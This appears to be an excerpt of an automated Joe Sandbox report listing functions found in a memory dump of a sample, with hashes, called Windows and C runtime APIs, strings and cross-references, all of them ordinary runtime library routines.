Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fd808a48e965f23cca1589f72c67c4a1a2061a59ce550e67e7f2b8cea3640d6
Instruction ID: a2a6ddd451c8831b454619cc19d077603882c811842aae509e8af4fa2a78d96b
Opcode Fuzzy Hash: 9fd808a48e965f23cca1589f72c67c4a1a2061a59ce550e67e7f2b8cea3640d6
Instruction Fuzzy Hash: F4B12570A04244AFDF1BDFE9D862BFD7BBAAF4E300F154159E4019B292CB709982CB51

Function 0030D2C0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0030D2B7,00305FB7,00305179), ref: 0030D2CE
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0030D2DC
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0030D2F5
SetLastError.KERNEL32(00000000,0030D2B7,00305FB7,00305179), ref: 0030D347

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 484c85d60a2f50d15e5c2f3b6030969e29b054dc610d9760df0dbbafb751c388
Instruction ID: e6b04e906ec372e84ecc4b9781ba39a4642c53716613381661c99a5ece056cfa
Opcode Fuzzy Hash: 484c85d60a2f50d15e5c2f3b6030969e29b054dc610d9760df0dbbafb751c388
Instruction Fuzzy Hash: BE01FC3620F7159ED63B17F47CD597B2ADCEB06774B24036DF110594E0EF214D855291

Function 0030DB88 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0030DCA7
CallUnexpected.LIBVCRUNTIME ref: 0030DF20

Strings

csm, xrefs: 0030DBC5
csm, xrefs: 0030DC32
csm, xrefs: 0030DCDE

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: b894e0ee776f6b451bb87b8dedcc19c5d4aaedd8bb0c84de807b30db2785ec1f
Instruction ID: 06cd8ab056a68b84190737f7ca94d0747dc846536d7169c759bbd03b404ae04a
Opcode Fuzzy Hash: b894e0ee776f6b451bb87b8dedcc19c5d4aaedd8bb0c84de807b30db2785ec1f
Instruction Fuzzy Hash: FCB16871802209EFCF2ADFE4C8A19AEBBF5FF14310B15455AE8016F286D771EA51CB91

Function 0030457B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00304582
std::_Lockit::_Lockit.LIBCPMT ref: 0030458C

Part of subcall function 003024C2: std::_Lockit::_Lockit.LIBCPMT ref: 003024DE
Part of subcall function 003024C2: std::_Lockit::~_Lockit.LIBCPMT ref: 003024F7

codecvt.LIBCPMT ref: 003045C6
std::_Lockit::~_Lockit.LIBCPMT ref: 003045FD

Strings

hf2, xrefs: 00304597

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
String ID: hf2
API String ID: 3716348337-1123409451
Opcode ID: fa456e02e79da3d2f9d8d999f7bbf86b5c2454f466ed000c9e8018956dce88fb
Instruction ID: 368591e520c4c9066363bf38a64e3436d9d3e7c3251fe917a864bee1a19cae9b
Opcode Fuzzy Hash: fa456e02e79da3d2f9d8d999f7bbf86b5c2454f466ed000c9e8018956dce88fb
Instruction Fuzzy Hash: 7C01D2759022198BCB07EBA4D83A6AEB775BF55310F240508E511AF2D1DF749E028B91

Function 00308C55 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0031B774,000000FF,?,00308D16,00308BFD,?,00308DB2,00000000), ref: 00308C8A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00308C9C
FreeLibrary.KERNEL32(00000000,?,?,00000000,0031B774,000000FF,?,00308D16,00308BFD,?,00308DB2,00000000), ref: 00308CBE

Strings

CorExitProcess, xrefs: 00308C94
mscoree.dll, xrefs: 00308C83

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ad27731923205cdd9b9de6dce793c0534af367b28bacd43a993698d26f496cd5
Instruction ID: aa7c069e404292a4632b680b2ac6ba6dfd856a78aa7b8c9ceeb8cfc2c776884c
Opcode Fuzzy Hash: ad27731923205cdd9b9de6dce793c0534af367b28bacd43a993698d26f496cd5
Instruction Fuzzy Hash: FD01A771941615EFDB138B54DC09FEEB7BCFB45B11F000529F811A22D0DB749900CA90

Function 0030FC3D Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0030FCC2
__alloca_probe_16.LIBCMT ref: 0030FD8B
__freea.LIBCMT ref: 0030FDF2

Part of subcall function 0030E531: HeapAlloc.KERNEL32(00000000,003031E1,0030186A,?,003060C1,0030186C,0030186A,?,?,?,00303181,003031E1,0030186E,0030186A,0030186A,0030186A), ref: 0030E563

__freea.LIBCMT ref: 0030FE05
__freea.LIBCMT ref: 0030FE12

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: e024631aef31d276045b4c2a44220bc413e53402d8389ddd452d00bcee085439
Instruction ID: 4c599a52c02d686f7ab2ac67e0bde684711c9fe857542e68913a08d2c8844ea2
Opcode Fuzzy Hash: e024631aef31d276045b4c2a44220bc413e53402d8389ddd452d00bcee085439
Instruction Fuzzy Hash: E051A272602206AFEB32AF65DCA5EBB76A9EF44710B160438FD04DA5D1EB34CC50D6A0

Function 00303010 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00303017
std::_Lockit::_Lockit.LIBCPMT ref: 00303022
std::_Lockit::~_Lockit.LIBCPMT ref: 00303090

Part of subcall function 00302EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00302EFC

std::locale::_Setgloballocale.LIBCPMT ref: 0030303D
_Yarn.LIBCPMT ref: 00303053

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 37ae440e1f6663b249f954a675317881a6da698b366b2cd68af727d8c0fbcad4
Instruction ID: cd8a9c333e22c3d1f8f4991dd488ff52e5f1013db1475c5a0c080521fcf63660
Opcode Fuzzy Hash: 37ae440e1f6663b249f954a675317881a6da698b366b2cd68af727d8c0fbcad4
Instruction Fuzzy Hash: FC018FB5A025249BCB1BEF60D86967E7769FF85740F14400DE8125B3C1CF346E42CB81

Function 00317E92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00317F2E,00000000,?,00326E10,?,?,?,00317E65,00000004,InitializeCriticalSectionEx,0031E57C,0031E584), ref: 00317E9F
GetLastError.KERNEL32(?,00317F2E,00000000,?,00326E10,?,?,?,00317E65,00000004,InitializeCriticalSectionEx,0031E57C,0031E584,00000000,?,0030E1DC), ref: 00317EA9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00317ED1

Strings

api-ms-, xrefs: 00317EB6

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 23c6ed9de192ef25479f4f4ef3690591d04fe5731e100140d3b71ae9375183c4
Instruction ID: 2b5a2ab9953e739f93f0e958067254a7c20a628935046b149e4a7f07f447a2b1
Opcode Fuzzy Hash: 23c6ed9de192ef25479f4f4ef3690591d04fe5731e100140d3b71ae9375183c4
Instruction Fuzzy Hash: 25E04F30384209BBEF231B61EC06B993BADDB14B50F144070FA4DB84E1E7A59E9196D4

Function 0031562D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00315690

Part of subcall function 0030E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0030FDE8,?,00000000,-00000008), ref: 0030E6A2

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003158E2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00315928
GetLastError.KERNEL32 ref: 003159CB

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 1b753b152ff474eae44595bc23ff3ed63d9b90deafc4de7d1c3a39088ebfff81
Instruction ID: 25c99efe86fbef5783a9cd9ef1d8f0abf953d8ad734d23f58db83a3542391750
Opcode Fuzzy Hash: 1b753b152ff474eae44595bc23ff3ed63d9b90deafc4de7d1c3a39088ebfff81
Instruction Fuzzy Hash: 28D15B75E04648DFCF1ACFA8D8909EDBBB9FF49310F24452AE456EB251D730A982CB50

Function 0030D8AF Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0030D976
___AdjustPointer.LIBCMT ref: 0030D999
___AdjustPointer.LIBCMT ref: 0030DA35

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e506f0c5c92d13335bb0464f636d4c6064d5d66f16f7fb372fc1929b41086279
Instruction ID: 80f50517c7f9b3e45ae1a199cd34f25e5a10c74672f6bdd95c4b71b61cecd5ea
Opcode Fuzzy Hash: e506f0c5c92d13335bb0464f636d4c6064d5d66f16f7fb372fc1929b41086279
Instruction Fuzzy Hash: 4F51DE72A06702AFDB2B9F94D861BBAB7E4EF05310F15442DE8429B6D1E731ED40CB90

Function 00313537 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0030E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0030FDE8,?,00000000,-00000008), ref: 0030E6A2

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0031359B
__dosmaperr.LIBCMT ref: 003135A2
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 003135DC
__dosmaperr.LIBCMT ref: 003135E3

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: e0596d1eb9336643a8aba78b9c5f97ac02d0531ad4c954a40d81c0d730586a2a
Instruction ID: dd15d66b4e99e09b2af64336d04d32095c14905f5d99c3a9475ddb050115ee14
Opcode Fuzzy Hash: e0596d1eb9336643a8aba78b9c5f97ac02d0531ad4c954a40d81c0d730586a2a
Instruction Fuzzy Hash: 53212C71601705AFCB27AF65D8518ABBBAEFF0A7647004519F8258B540D730EF808B90

Function 00308042 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24b69683ad87b509d98dc27cebab9c80fd70f51e7af922e0dfe60fa3d6cc184a
Instruction ID: f225b823a304b1fadf4abe6511c2c458d01496f45d02bdfb19437673eea25e29
Opcode Fuzzy Hash: 24b69683ad87b509d98dc27cebab9c80fd70f51e7af922e0dfe60fa3d6cc184a
Instruction Fuzzy Hash: 6F21F331602606BFCB23AF61DC7092B77ADAF003647114528F8A58B6C1DF71EC408BA1

Function 0031484F Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00314857

Part of subcall function 0030E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0030FDE8,?,00000000,-00000008), ref: 0030E6A2

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0031488F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003148AF

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 51a859b70b58ebe58f3107c5e8d195e5b5b3104ad43a6d333aed7a1529fd479d
Instruction ID: 71629a00ece8bf5b258870a6691d691be08b6b446805cdcc8968bdee8c560a0a
Opcode Fuzzy Hash: 51a859b70b58ebe58f3107c5e8d195e5b5b3104ad43a6d333aed7a1529fd479d
Instruction Fuzzy Hash: F11166F26032657FA72727B6AC9DCBF295CCE8A3947100824F401E5100FB69CE818671

Function 0031A4E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00319B0F,00000000,00000001,00000000,?,?,00315A1F,?,00000000,00000000), ref: 0031A4F7
GetLastError.KERNEL32(?,00319B0F,00000000,00000001,00000000,?,?,00315A1F,?,00000000,00000000,?,?,?,00315365,00000000), ref: 0031A503

Part of subcall function 0031A554: CloseHandle.KERNEL32(FFFFFFFE,0031A513,?,00319B0F,00000000,00000001,00000000,?,?,00315A1F,?,00000000,00000000,?,?), ref: 0031A564

___initconout.LIBCMT ref: 0031A513

Part of subcall function 0031A535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0031A4D1,00319AFC,?,?,00315A1F,?,00000000,00000000,?), ref: 0031A548

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00319B0F,00000000,00000001,00000000,?,?,00315A1F,?,00000000,00000000,?), ref: 0031A528

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 588088e286dcce978fc103c55ee2ef7c2babd7857e13073ec1efa3f8f56b40ff
Instruction ID: 19ddc9f1c0e224159f3045ba4a1917b3888af674dda55aaf0ab46b82a442fe51
Opcode Fuzzy Hash: 588088e286dcce978fc103c55ee2ef7c2babd7857e13073ec1efa3f8f56b40ff
Instruction Fuzzy Hash: BCF01C36111615BFCF371FA5EC09ADA3F2BFF8A3A1F014514FA4985120D63289619B91

Function 003059A7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 003059B9
GetCurrentThreadId.KERNEL32 ref: 003059C8
GetCurrentProcessId.KERNEL32 ref: 003059D1
QueryPerformanceCounter.KERNEL32(?), ref: 003059DE

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 1433cc07192675c6800698df1afbc941280be875774aa2d1fb8137d36543219a
Instruction ID: 3caa19a355ca9b0db3279473c4b1e26d88afbd480a2fdf8b943be8bbf1b92a38
Opcode Fuzzy Hash: 1433cc07192675c6800698df1afbc941280be875774aa2d1fb8137d36543219a
Instruction Fuzzy Hash: 97F0AF30D1120CEBCB01EBB4D94999EBBF8FF1D300B9145AAA412E7110E734AB458F50

Function 00312117 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030E783: GetLastError.KERNEL32(00000000,?,00310AB9), ref: 0030E787
Part of subcall function 0030E783: SetLastError.KERNEL32(00000000,?,?,00000028,0030B9D2), ref: 0030E829

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00309266,?,?,?,00000055,?,-00000050,?,?,?), ref: 003121D6
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00309266,?,?,?,00000055,?,-00000050,?,?), ref: 0031220D

Strings

utf8, xrefs: 003122DF

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: b3ccfecd49b890beeb3bcbbb2114e31c90cd622cfc93a69b063abfffa94e4f27
Instruction ID: da412748b1d00a337ac7dbcd512ee6a1a6303d8bcb3170fef72aba2c07b54247
Opcode Fuzzy Hash: b3ccfecd49b890beeb3bcbbb2114e31c90cd622cfc93a69b063abfffa94e4f27
Instruction Fuzzy Hash: 7B510775640305AAD72FAB748C42BEB73A8EF4C700F110829FA55DB1C1FB74E9E08665

Function 0030DFAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

